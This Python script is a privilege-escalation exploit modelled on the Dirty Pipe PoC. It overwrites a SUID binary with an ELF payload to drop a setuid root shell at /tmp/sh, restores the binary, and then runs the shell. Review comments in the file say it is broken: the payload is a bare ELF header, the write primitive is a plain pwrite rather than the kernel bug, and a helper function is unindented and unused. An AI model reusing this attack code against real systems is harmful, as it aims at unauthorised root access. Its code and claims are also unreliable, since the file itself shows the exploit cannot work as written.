import fcntl
import mmap
import os
import platform
import stat
import subprocess
import sys
# Payload that main() writes over the first bytes of the target via
# hax(path, 1, elfcode).  It begins with the ELF magic and an ELFCLASS64 byte,
# i.e. it is an ELF64 file header.
# NOTE(review): the literal is only three short lines (roughly 72 bytes) and the
# last line is all zeros, so nothing follows the header -- no program header
# table, no code.  A file patched with this is not a loadable program, and the
# "drop /tmp/sh" step in main() cannot work with it.  The public Dirty Pipe PoC
# carries a several-hundred-byte payload at this point; if this file was
# truncated while being copied, this is the first thing to check.  The bytes
# are kept exactly as found; do not edit them by hand.
elfcode: bytes = (
    b'\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x3e\x00\x01\x00\x00\x00'
    b'\x78\x00\x40\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
def prepare_pipe():
# create pipe
p = os.pipe()
pipe_size = fcntl.fcntl(p[1], fcntl.F_GETPIPE_SZ)
buffer = bytearray(4096)
# fill the pipe
for r in range(pipe_size, 0, -len(buffer)):
os.write(p[1], buffer[:min(len(buffer), r)])
# drain the pipe
for r in range(pipe_size, 0, -len(buffer)):
os.read(p[0], min(len(buffer), r))
return p
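def hax(filename, offset, data):
    """Overwrite ``len(data)`` bytes of *filename* starting at file offset ``offset - 1``.

    Despite the "mimic the splice operation" comment in the original, this is
    an ordinary ``open(O_RDWR)`` + ``pwrite`` and does NOT exercise Dirty Pipe
    (CVE-2022-0847).  It succeeds only when the caller already has write
    permission on *filename*; on a root-owned SUID binary it fails with
    EACCES, which is exactly the case the script is aimed at.  The pipe-based
    primitive from the C PoC (``prepare_pipe`` + ``splice`` + write into the
    pipe) is not reproduced here, and ``prepare_pipe`` goes unused.
    NOTE(review): even where the write is permitted, the kernel normally clears
    the setuid bit on a file written through ``write(2)`` by a process without
    CAP_FSETID, so the patched binary would no longer be SUID -- confirm before
    relying on this path.

    Args:
        filename: path of the file to patch.
        offset: 1-based position; bytes land at file offset ``offset - 1``,
            so ``hax(path, 1, data)`` patches from the very first byte.
        data: bytes-like payload; short writes are retried until all of it
            has been written.

    Returns:
        0 on success, -1 on any ``OSError`` (which is also printed), matching
        the C PoC's convention that callers test with ``!= 0``.
    """
    try:
        fd = os.open(filename, os.O_RDWR)
    except OSError as e:
        print("Error:", e)
        return -1
    try:
        view = memoryview(data)
        pos = offset - 1
        # pwrite avoids a separate lseek; it may still write fewer bytes than
        # asked, so loop until the whole payload is on disk.
        while view:
            written = os.pwrite(fd, view, pos)
            if not written:
                raise OSError("short write to {}".format(filename))
            view = view[written:]
            pos += written
    except OSError as e:
        print("Error:", e)
        return -1
    finally:
        # Always release the descriptor, even when the write fails.
        os.close(fd)
    return 0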
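def main():
    """Patch the SUID binary named on the command line, run it, then restore it.

    Flow: save the first ``len(elfcode)`` bytes of the target, overwrite them
    with ``elfcode`` through ``hax``, execute the target (the payload is
    expected to leave a setuid shell at ``/tmp/sh``), write the saved bytes
    back, and finally run ``/tmp/sh``.

    NOTE(review): ``hax`` is a plain write rather than the Dirty Pipe
    page-cache primitive, so this only gets past the "hijack" step on a file
    the current user can already write to, and ``elfcode`` as present in this
    file is a bare ELF header with no code behind it.  Treat the script as a
    skeleton of the PoC's control flow, not as a working exploit.

    Exits with status 1 on bad usage, an unreadable or too-short target, or a
    failed patch/restore.
    """
    if len(sys.argv) != 2:
        print("Usage: {} SUID".format(sys.argv[0]))
        sys.exit(1)
    path = sys.argv[1]

    # Save the bytes about to be clobbered so they can be written back later.
    try:
        with open(path, 'rb') as f:
            orig_bytes = f.read(len(elfcode))
    except OSError as e:
        print("Error opening file:", e)
        sys.exit(1)
    # If the target is shorter than the payload, the patch would grow the file
    # and restoring len(orig_bytes) bytes would leave the tail of elfcode
    # behind.  Refuse instead of leaving a corrupted binary.
    if len(orig_bytes) < len(elfcode):
        print("[~] Target is smaller than the payload ({} < {} bytes); refusing".format(
            len(orig_bytes), len(elfcode)))
        sys.exit(1)

    print("[+] Hijacking suid binary...")
    if hax(path, 1, elfcode) != 0:
        print("[~] Failed to hijack")
        sys.exit(1)

    print("[+] Dropping suid shell...")
    # Run the patched target directly, without a shell: the path comes from
    # argv and may contain spaces or shell metacharacters.  A failed exec
    # (e.g. ENOEXEC because elfcode is not a loadable program) raises OSError
    # here and must not skip the restore below.
    try:
        subprocess.run([path], check=False)
    except OSError as e:
        print("Error running target:", e)

    print("[+] Restoring suid binary...")
    if hax(path, 1, orig_bytes) != 0:
        print("[~] Failed to restore")
        sys.exit(1)

    print("[+] Popping root shell... (don't forget to clean up /tmp/sh ;))")
    try:
        subprocess.run(["/tmp/sh"], check=False)
    except OSError as e:
        # Most likely the payload never produced /tmp/sh (see the NOTE above).
        print("Error running /tmp/sh:", e)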
if __name__ == "__main__":
    # Script entry point; nothing runs when the module is merely imported.
    raise SystemExit(main())